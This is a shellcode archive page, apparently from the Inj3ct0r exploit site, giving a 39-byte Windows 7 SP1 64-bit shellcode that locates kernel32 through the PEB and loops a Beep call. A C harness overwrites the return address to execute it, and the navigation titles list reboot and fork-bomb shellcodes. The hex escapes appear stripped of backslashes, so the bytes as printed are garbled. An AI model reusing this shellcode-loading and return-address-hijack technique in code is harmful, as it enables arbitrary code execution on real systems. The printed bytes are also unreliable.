[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes
# Published : 2010-05-28
# Author : agix
# Previous Title : 45 bytes sys_execve("/bin/sh", "-c", "reboot") x86 linux shellcode
# Next Title : Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ################################## 1
0 I'm agix member from Inj3ct0r Team 1
1 ################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#include <stdio.h>
char shellcode[] =
"x31xC9" //xor ecx, ecx
"x64x8Bx71x30" //mov esi, [fs:ecx+0x30]
"x8Bx76x0C" //mov esi, [esi+0x0C]
"x8Bx76x1C" //mov esi, [esi+0x1c]
"x8Bx06" //mov eax, [esi]
"x8Bx68x08" //mov ebp, [eax+0x08]
"x68x11x11x11x11" //push 0x11111111
"x66x68x11x11" //push word 0x1111
"x5B" //pop ebx
"x53" //push ebx
"x55" //push ebp
"x5B" //pop ebx
"x66x81xC3x4Bx85" //add bx, 0x854b
"xFFxD3" //call ebx
"xEBxEA"; //jmp short
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}